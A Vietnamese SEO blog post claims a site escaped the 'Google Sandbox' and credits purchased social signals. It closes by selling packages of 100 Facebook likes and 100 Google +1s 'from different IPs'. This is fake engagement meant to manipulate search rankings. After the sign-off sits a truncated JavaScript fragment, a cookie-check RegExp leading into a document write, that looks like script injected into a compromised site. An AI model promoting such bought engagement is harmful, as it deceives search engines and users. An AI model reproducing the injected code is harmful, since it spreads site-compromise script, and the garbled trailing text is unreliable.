Gỡ Google Sandbox thành công

Một thời gian trước, tôi có viết về việc test gỡ Google Sandbox tại đây: http://pridio.com/kien-thuc/seo/test-go-google-sandbox/

Kết quả

dich vu seo go google sandbox thanh cong

Cũng với 97 từ khóa, như các bạn đã thấy đã tăng từ gần đý lên 29% và sẽ tăng mạnh trong thời gian tới.

Trong bài trước, tôi đã nói qua về mô hình tôi test gỡ Google Sandbox, đây là một mô hình cực mạnh, nhưng khá mất thời gian để làm. Qua đo lường ban đầu tôi nhận thấy những yếu tố ảnh hưởng lớn nhất đến kết quả là những link từ mạng xã hội, thực ra cũng không hẳn là link, nó là Google +1 và Facebook like. Để “cứu” website này, tôi tăng khoảng 100 Google +1 và 100 like.

Hiệu quả của mạng xã hội

Mạng xã hội ngày càng ảnh hưởng lớn đến kết quả tìm kiếm, nó không chỉ giúp các website bị sandbox mà còn ảnh hưởng rất tốt nếu bạn đang SEO. Các mạng xã hội ở đây được hiểu là Google +, Twitter, Facebook,… các forum cũng là mạng xã hội nhưng lại không được tính ở đây, vì các lý do sau:

  1. Người dùng chuyển từ sinh hoạt Forum sang các mạng xã hội nói trên.
  2. Dân làm SEO lạm dụng sự ảnh hưởng của Forum, spam như điên nên Google có nhiều thuật toán chống spam như Panda, Penguin.
  3. Chưa nhiều dân làm SEO để ý làm mạnh mạng xã hội.

Cách xây link mạng xã hội

Hiệu quả, nhưng phải xây cho đúng. Bạn có thể trao đổi like, +1. Nhưng tuyệt đối tránh xa các trang như ylh, addmefast,… vì đó là “+1 from other site” – từ các trang web khác. Google thừa hiểu điều này.

Hoặc nhanh hơn, Pridio cung cấp gói 100 like Facebook, 100 Google +1 từ các IP khác nhau với giá chỉ 200k. Chúng tôi không phổ biến dịch vụ này mà chỉ dành cho những ai tìm thấy và thực sự cần. Để đăng ký dịch vụ vui lòng gửi email đến [email protected] với tiêu đề “Mua like và +1”.

Chúc các bạn thành công với SEO.

 

 

  (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘